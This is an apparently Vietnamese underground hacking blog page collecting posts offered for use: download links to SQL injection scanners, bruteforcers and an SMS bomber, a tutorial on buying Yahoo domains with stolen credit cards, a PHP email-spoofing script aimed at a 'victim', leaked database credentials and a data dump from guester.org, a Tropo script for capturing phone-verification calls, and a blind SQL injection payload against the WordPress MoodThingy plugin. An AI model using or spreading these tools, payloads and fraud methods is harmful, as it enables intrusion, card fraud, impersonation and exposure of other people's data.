Trang

Link Grabber | SQL Injection Scanner cho Chrome

 Download: 
Code:
http://www.mediafire.com/?77nct2ls738zxnd


Pass: sunflowercomeback

Hướng dẫn dùng:
Download -> Giải nén -> Mở Chrome -> Settings (Cài đặt) -> Extensions (Tiện ích mở rộng) -> Bật chế độ dành cho nhà phát triển (Dev Mode) -> Load extension... -> Chọn thư mục "source" vừa giải nén -> Restart lại Chrome --> Mở Google.com -> Điền dork muốn search -> Nhấn vào hình cái đầu lâu ở góc thanh địa chỉ (Nếu lần đầu không đc thì bạn nhấn lại lần 2)

Nguồn: http://junookyo.blogspot.com/search/label/SQL%20Injection?updated-max=2012-09-21T21:06:00-07:00&max-results=20&start=20&by-date=false

Xem Thêm
Người đăng: Unknown vào lúc 14:57 0 nhận xét

 

Reiluke Tools

Bộ Tool này gồm 14 em gồm các chức năng sau:
admin finder
blind Sqli
cpanel bruteforcer
duplicate remover
email brute
email checker
exploit scanner
php rapidshare checker
rapidshare checker
sms bomber
sqli column counter
sqliHelper 2.7
steam checker
Link Download:
http://www.mediafire.com/?g3a8eqqu614wzev


Nguồn: http://junookyo.blogspot.com/2012/09/reiluke-tools.html

Xem Thêm
Người đăng: Unknown vào lúc 14:57 0 nhận xét

 

Tut đâm domain Yahoo

NOTICE: Để ra mắt cả nhà với nhiệm vụ là admin mới  thì làm cái tut đâm em domain chơi ;)

Nguyên liệu: ccv đủ bl
Sock : cứ IP việt nam mà phang
Làm thôi nào:) đầu tiên vào trang này  http://smallbusiness.yahoo.com/domains

Sau đó làm theo trình tự nhé ;)






Như hình phía dưới là PED nhé :D còn ko thay con cc khác xem :-s mình thay 6 con :))

 

Xem Thêm
Người đăng: Unknown vào lúc 19:45 0 nhận xét

 

Bug tin nhắn FaceBook

Thực chất là fake mes thôi
php dưới
?php

$to 'victim@facebook.com';$subject '';$message 'Hello, hacked by Duong';$header 'From: admin@binhduong-ug.com
Reply-To: admin@binhduong-ug.com';$mail mail($to,$subject,$message,$header);

if($mail) {
echo 'Your Email was Sent Succesfully to '.$to;
}?><hr />
<hr />

Xem Thêm
Người đăng: Unknown vào lúc 19:42 0 nhận xét

 

Share Code - data Guester.org 24/10/2012 FORUM UG

admin còn non trẻ quá


http://guester.org/

$config['Database']['dbname'] = 'break_1';

$config['MasterServer']['username'] = 'break_1';
$config['MasterServer']['password'] = 'sida123';
 code : http://www.mediafire.com/?uauzfl46nd35xaj
link data 24/10/2012 : http://www.mediafire.com/?iw5hwjjh3jj5x92

Xem Thêm
Người đăng: Unknown vào lúc 19:40 2 nhận xét

 

Tut UG - Verify phone call - cho ai chưa biết !

victim: http://tropo.com
1. anh em vào reg cái níc
2. Đăng nhập. Ấn vào Creat new Application

vào Tropo Scripting. Phần Tropo ScriptinApplication Name: chỉ là tên của app thôi nên điền tên j cũng được

Phần What URL powers your app? thì nháy vào Hosted File chọn Creat new sẽ hiện ra 1 khung và điền vào như sau:
Code:
Mã:

<?php
record("Please", array(
"beep"=>"true",
"timeout"=>10,
"silenceTimeout"=>7,
"maxTime"=>40,
"terminator" => "#",
"recordFormat" => "audio/mp3",
"recordURI" => "ftp://yourdomain.com/tropo.mp3",
"recordUser" => "xxxxxxx",
"recordPassword" => "yyyyyyy"
)
);
?>

3 dòng này thì a e tự điền vào domain của mình
Mã:

"recordURI" => "ftp://yourdomain.com/tropo.mp3",
"recordUser" => "xxxxxxx",
"recordPassword" => "yyyyyyy"

Nhìn là hiểu nhỉ .
Chức năng của đoạn code này là; lúc nó call đến verify, nó sẽ record và lưu về host của mình theo đúng đường dẫn của ftp.. nếu ghi như sau: ftp://thienthan8x.cu.to/tropo.mp3 mà host sd cpanel thì nó sẽ up lên ngay thư mục ngoài ngang hàng với public_html
chọn creat file



Tiếp theo Add a new phone number Chọn state a e muốn rồi add number

Sau đó ấn vào cái dòng có 1 dãy ký tự này rồi chọn Launch taken rồi đợi khoảng 1-2 phút là có thể sd được số phone vừa add kia. lúc verify xong thì lên host down file mp3 kia về nghe đoạn code thôi .

Xem Thêm
Người đăng: Unknown vào lúc 19:41 0 nhận xét

 

Add-on firefox fake sock+referal+clear cache,cookies

Nếu bạn thấy khó chịu khi lúc nào muốn fake ip bằng firefox mà cũng phải làm các bước lằng nhằng phức tạp:


tool ------> options ------------> advanced----------->Network-----------> settings---------->manual proxy.....

Hãy thay đổi cách làm việc của bạn. chỉ cần copy và paste socks thôi.

bạn sẽ loại bỏ được 6 bước phức tạp kia với addon của ff.
http://proxies.delicacyset.com/fireproxy.jsp

Fireproxy: https://addons.mozilla.org/firefox/d...dp-btn-primary

Phím tắt:
Shortcuts:

Alt + A - toggle on/off proxy state;
Alt + 1 - set HTTP(S) proxy type;
Alt + 2 - set SOCKS4 proxy type;
Alt + 3 - set SOCKS5 proxy type;
Alt + M - edit referrers;
Alt + C - clear cache;
Alt + R - remove browser and flash cookies;



ps: anh em có thể kiểm tra bằng cách vô lại các bước thông thường như trên thì thấy socks đã vô đúng vị trí.

Xem Thêm
Người đăng: Unknown vào lúc 19:40 0 nhận xét

 

Share Skin ĐCVN

Vui lòng để nguồn khi share lại skin
Skin RIP nên sẽ không support
Bạn nào cài có lỗi cứ post bài lên mình sẽ giúp

P/s: Đọc file huongdan.txt trong thư mục HUONG DAN để làm đúng nhất

Cảm ơn đã ủng hộ skinvbb.net

Download: http://www.mediafire.com/?42zkuivnzeiab29

Pass: skinvbb.net

Xem Thêm
Người đăng: Unknown vào lúc 18:22 0 nhận xét

 

[Share] PHP Yahoo Messenger Send PM

Xem Thêm
Người đăng: Unknown vào lúc 11:07 0 nhận xét

 

[Software] Tool Scan XSS


Mình download trên mạng có thể dính em bé mọi người thấy thích thì download về dùng


Tool scan XSS | Juno_okyo's Blog


http://www.mediafire.com/?crdx77ueotbh8u1
Pass download: vhb

Xem Thêm
Người đăng: Unknown vào lúc 19:17 0 nhận xét

 

WordPress MoodThingy Widget v0.8.7 Blind SQL Injection

# Exploit Title: WordPress MoodThingy Mood Rating Widget v0.8.7 Blind SQL Injection
# Date: 7/2/12
# Exploit Author: Chris Kellum
# Vendor Homepage: http://www.moodthingy.com/
# Software Link: http://downloads.wordpress.org/plugi...dget.0.8.7.zip
# Version: 0.8.7



=====================
Vulnerability Details
=====================

Input data from the form submission is not properly sanitized.

Using blind SQL injection techniques, true statements will result in the rating being updated, while false statements will cause the plugin to hang.

=================
Injection Example
=================

Using Burp Suite or other proxy, intercept the post request when submitting the form and append and 1=1 to the postID parameter before forwarding.

True statement example:

action=cast_vote&token=d9ad983425&moodthingyvote=6 &postID=6 and 1=1&results_div_id=voteresults

In the example above, the request will process successfully and the rating will be updated accordingly.

By replacing 1=1 with 1=0, the plugin will hang and the process will never successfully complete, giving you the necessary true/false conditions for blind sql injections.

Xem Thêm
Người đăng: Unknown vào lúc 19:17 0 nhận xét

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương